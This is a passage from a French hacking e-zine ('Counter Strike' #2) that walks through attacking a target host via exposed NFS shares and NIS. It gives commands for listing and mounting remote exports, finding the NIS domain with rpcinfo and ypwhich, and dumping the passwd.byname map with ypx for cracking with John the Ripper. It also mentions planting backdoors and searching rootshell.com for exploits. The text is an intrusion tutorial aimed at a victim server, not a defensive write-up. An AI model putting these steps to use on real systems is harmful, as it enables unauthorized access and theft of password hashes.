Voila, un account pour vous et en utilisant ce kon a vu audessus (nmap), ben
vous allez sur rootshell.com et vous me trouvez un tit exploit =)
Bon c'est koi NFS ?
En fait c un protocole reseau qui permet de vous faire bosser sur un fichier a l'autre bout du monde en vous donnant l'illusion qu'il est sur votre PC en fait on peut comparer c'est l'aquivalent de la commande mount mais avec le hd d'un autre pc distant. On va s'en servir pour inspecter la cible , ou meme avoir un shell branche dessus . Il se peut aussi que vous puissiez y placer des taupes en tout genre ou des backdoors. A part ca vous pourrez tres bien prendre l'UID ou le GID ( User Identification Number / Group Identification Number ) d'un utilisateur quelquonque en parametrant votre Linux .
Pour connaitre les fichiers qui pouraient etres exportes tapez dans un shell
: #showmount -e www.url.com
export list
for www.url.com
/etc (everyone)
/bin (bibi)
Traduction
:
/etc (everyone) : signifie que n'importe qui
peut exporter ce repertoire
/bin (bibi) : signifie que seul l'utilisateur
bibi peut exporter ce repertoir
Pour exporter un systeme de repertoire sur un des dossiers de votre pc , tapez :
#mount -t nfs www.url.com:/systeme_de_repertoires_distant /votre_dossier
ex: #mount -t nfs www.url.com:/etc /mnt/nfs
Dans ce cas la vous trouverez le contenu du hd distant dans le dossier mnt/nfs mais le dossier nfs a du etre cree auparavant.
Je tient a preciser pour ceux qui ne le savent pas que c'est de plus en plus rares de trouver des cas comme cela.
-Je parlerai en dernier lieu de NIS, un truc un peu plus courant que les failles nommées ci dessus:
NIS, c'est un
service de partage de base de données systeme d'un réseau.(
du genre etc/group et etc/passwd ).Il sert a exporter par exemple les mots
de passes d'un utilisateur vers le réseau, ainsi, il peut avoir acces
a son shell depuis nimporte quelle bécane du réseau.
Bref, plus le réseau est gros, plus y'a de chances d'avoir NIS.
Pour voir si ya NIS, rien de plus simple:
Tipwar@root #
rpcinfo -p www.cible.com
program
vers proto port
100004 2
tcp 673 ypserv
100005 1
udp 721 mountd
100003 2
udp 2049 nfs
100026 1
udp 733 bootparam
100017 1
tcp 1274 rexd
Ah! La c'est
cool, y'a ypserv, ca veut dire qu'il ya forcément NIS sur ce server.
(Ya aussi bootparam, qui nous indique que c'est une machine sans lecteur de
disquettes.)
Maintenant, il va falloir trouver nom de domaine NIS, qui est le nom d'une
autre machine, gérant NIS sur le réseau.Ca, c'est le truc le
plus chiant...Pour le trouver, on a deux solutions: soit on le trouve comme
ca:
Tipwar $ ypwhich
-d cible www.cible.com
kewl.cible.com
>C'est bon vous l'avez !
Tipwar $ ypwhich
-d cible www.cible.com
domain not bound
>C'est pas bon vous l'avez pas.Donc on va essayer autre chose:
Avec rpcinfo, on a vu que le server runnait aussi NFS, cela veut dire que selon le cas, certaines machines peuvent monter un répertoire du serveur su leur disque.Pour le voir:
Tipwar@root #
showmount -e www.cible.com
export list for cible.com:
/export
(everyone)
/home/froot
maggy
Ici, nimporte qui peut monter le repertoire /export, mais le répertoire /home/froot, peut seulement etre monté par la machine maggy du domaine "cible" . Mais ca ne nous avence a rien; en fait, il faudrait plutot ceci :
/var (everyone)
Dans ce cas:
Tipwar@root # mount -t nfs www.cible.com:/var /mnt
puis allez voir dans /var/yp, c'est a dire /mnt/yp chez vous, et vous trouvez ce putain de nom de domaine...
BOON, maintenant,
y'a plus qu'a récupérer le fichier passwd en utilisant un prog
ki s'appelle YPX.(inclus dans le mag).
Supposons que vous attaquez www.cible.com et ke la machine qui gère
le NIS s'appelle kewl.victim.com, ca donnera ca :
Tipwar $ ypx -d kewl.cible.com cible -m passwd.byname
Voila.passwd.byname
(c'est une carte NIS ) c'est l'equivalent de /etc/passwd, donc: john the ripper
=)
Vla un tit tableau d'équvalence fichiers-cartesNIS:
Nom du file | Nom de la carte NIS |
passwd | passwd.byname |
group | group.byname |
networks | networks.byaddr |
hosts | hosts.byaddr |
protocols | protocols.bynumber |
services | services.byname |
aliases | mail.aliases |
ethers | ethers.byname |
Le mot de la fin:
mot
mmh j'ai pas
envie de faire d'outro donc j'en fait pas. :p
mmh un ptit greetz ?vi.
Donc greetz à Veinscutsl, remoux, Peace (qui code qui code) et les
autres !
Conclusion : Nous
voici au terme de la partie [ H A C K I N G ] de cette seconde issue
de Counter Strike. 2 articles
de cette partie ont etes faits par Fatal, nouvel arrivant dans le
groupe, les articles sont : 1 article
a aussi ete fait par Nnine, qui s'occuppe logiquement du phreacking
et pas du tout du hacking mais l'article est de bonne qualite et devrait
plaire a tous ceux qui ont envie de commencer a evoluer sur linux,
le sujet de l'article est : 2 articles
ont etes faits par moi (LoginX) qui suis bien content d'avoir un nouveau
partenaire pour s'occuper de cette rubrique avec moi, sans dire que
Neo-Soft (qui helas nous a quitte) ne s'occupait pas de cette rubrique,
son manque de disponibilite l'a incite a quitter le groupe et nous
le regretterons, enfin pour revenir a mes ptites affaires, je suis
tout content et tout, et mes articles pour ce numero de CounterStrike
#2 sont : Pour tout commentaire, tipiak@bigfoot.com Pour
plus de precision sur un article : |